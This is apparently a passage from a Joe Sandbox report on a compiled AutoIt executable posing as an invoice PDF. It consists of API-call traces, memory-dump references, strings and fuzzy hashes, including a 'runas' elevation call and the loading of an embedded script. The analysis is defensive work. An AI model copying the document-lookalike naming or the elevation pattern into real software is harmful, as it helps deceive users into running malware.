                                                                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                              • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000004), ref: 00431B0E
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,00000004), ref: 00431B3F
                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                              • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                              • String ID: @GH$@GH$C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                              • API String ID: 2493088469-4291044231
                                                                              • Opcode ID: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                              • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                              • Opcode Fuzzy Hash: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                              • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                              • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                              • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                              • String ID: pMH
                                                                              • API String ID: 2923339712-2522892712
                                                                              • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                              • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                              • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                              • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: IsThemeActive$uxtheme.dll
                                                                              • API String ID: 2574300362-3542929980
                                                                              • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                              • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                              • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                              • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(00000001,00000000), ref: 00436AEF
                                                                              • FindFirstFileW.KERNELBASE(00000001,?), ref: 00436B00
                                                                              • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                              • String ID:
                                                                              • API String ID: 48322524-0
                                                                              • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                              • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                              • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                              • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                              • _fseek.LIBCMT ref: 004527FC
                                                                              • __wsplitpath.LIBCMT ref: 0045285C
                                                                              • _wcscpy.LIBCMT ref: 00452871
                                                                              • _wcscat.LIBCMT ref: 00452886
                                                                              • __wsplitpath.LIBCMT ref: 004528B0
                                                                              • _wcscat.LIBCMT ref: 004528C8
                                                                              • _wcscat.LIBCMT ref: 004528DD
                                                                              • __fread_nolock.LIBCMT ref: 00452914
                                                                              • __fread_nolock.LIBCMT ref: 00452925
                                                                              • __fread_nolock.LIBCMT ref: 00452944
                                                                              • __fread_nolock.LIBCMT ref: 00452955
                                                                              • __fread_nolock.LIBCMT ref: 00452976
                                                                              • __fread_nolock.LIBCMT ref: 00452987
                                                                              • __fread_nolock.LIBCMT ref: 00452998
                                                                              • __fread_nolock.LIBCMT ref: 004529A9
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                              • __fread_nolock.LIBCMT ref: 00452A39
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                              • String ID:
                                                                              • API String ID: 2054058615-0
                                                                              • Opcode ID: 18084b85f4461eeb31286f7725c60aadc876f9327bd23da621607a4a59327eb6
                                                                              • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                              • Opcode Fuzzy Hash: 18084b85f4461eeb31286f7725c60aadc876f9327bd23da621607a4a59327eb6
                                                                              • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6

                                                                              Control-flow Graph

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                              • API String ID: 0-1896584978
                                                                              • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                              • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                              • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                              • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                              • __wsplitpath.LIBCMT ref: 00410C61
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcsncat.LIBCMT ref: 00410C78
                                                                              • __wmakepath.LIBCMT ref: 00410C94
                                                                                • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • _wcscpy.LIBCMT ref: 00410CCC
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                              • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                              • _wcscat.LIBCMT ref: 00429C43
                                                                              • _wcslen.LIBCMT ref: 00429C55
                                                                              • _wcslen.LIBCMT ref: 00429C66
                                                                              • _wcscat.LIBCMT ref: 00429C80
                                                                              • _wcsncpy.LIBCMT ref: 00429CC0
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                              • API String ID: 1004883554-2276155026
                                                                              • Opcode ID: 4dc9d493fc1f0bd93916e1b50bfde0fc01bc408925076b9d07e039c77bd8896c
                                                                              • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                              • Opcode Fuzzy Hash: 4dc9d493fc1f0bd93916e1b50bfde0fc01bc408925076b9d07e039c77bd8896c
                                                                              • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_fseek_wcscpy
                                                                              • String ID: FILE
                                                                              • API String ID: 3888824918-3121273764
                                                                              • Opcode ID: 0b8e7fb8d4654162d17f9f456e78b66f2dc64e424c61805434c56df38d84589e
                                                                              • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                              • Opcode Fuzzy Hash: 0b8e7fb8d4654162d17f9f456e78b66f2dc64e424c61805434c56df38d84589e
                                                                              • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32 ref: 00410326
                                                                              • RegisterClassExW.USER32 ref: 00410359
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                              • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                              • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                              • ImageList_ReplaceIcon.COMCTL32(00AC23C0,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                              • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                              • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                              • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                              • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                              • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                              • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                              • RegisterClassExW.USER32 ref: 004102C6
                                                                                • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00AC23C0,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                              • String ID: #$0$PGH
                                                                              • API String ID: 423443420-3673556320
                                                                              • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                              • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                              • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                              • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • _fseek.LIBCMT ref: 004525DA
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                              • __fread_nolock.LIBCMT ref: 00452618
                                                                              • __fread_nolock.LIBCMT ref: 00452629
                                                                              • __fread_nolock.LIBCMT ref: 00452644
                                                                              • __fread_nolock.LIBCMT ref: 00452661
                                                                              • _fseek.LIBCMT ref: 0045267D
                                                                              • _malloc.LIBCMT ref: 00452689
                                                                              • _malloc.LIBCMT ref: 00452696
                                                                              • __fread_nolock.LIBCMT ref: 004526A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1911931848-0
                                                                              • Opcode ID: 54555e82c7d90f1f4c78fdc7dccdeb041d202529d94e6077e6c0a3b2fb9f910e
                                                                              • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                              • Opcode Fuzzy Hash: 54555e82c7d90f1f4c78fdc7dccdeb041d202529d94e6077e6c0a3b2fb9f910e
                                                                              • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                              Control-flow Graph

                                                                              • Figure not preserved: control-flow graph, first block 40f450-40f45c.
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock_fseek_strcat
                                                                              • String ID: AU3!$EA06
                                                                              • API String ID: 3818483258-2658333250
                                                                              • Opcode ID: 3a312acd4387509a524006497359dc3cfb623b7b4978b3f3d4501f18df932f25
                                                                              • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                              • Opcode Fuzzy Hash: 3a312acd4387509a524006497359dc3cfb623b7b4978b3f3d4501f18df932f25
                                                                              • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

                                                                              Control-flow Graph

                                                                              • Figure not preserved: control-flow graph, first block 410130-410142; named calls in the graph: SHGetMalloc, SHGetDesktopFolder, SHGetPathFromIDListW.
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                              • String ID: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                              • API String ID: 192938534-1496786758
                                                                              • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                              • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                              • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                              • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                                                              Control-flow Graph

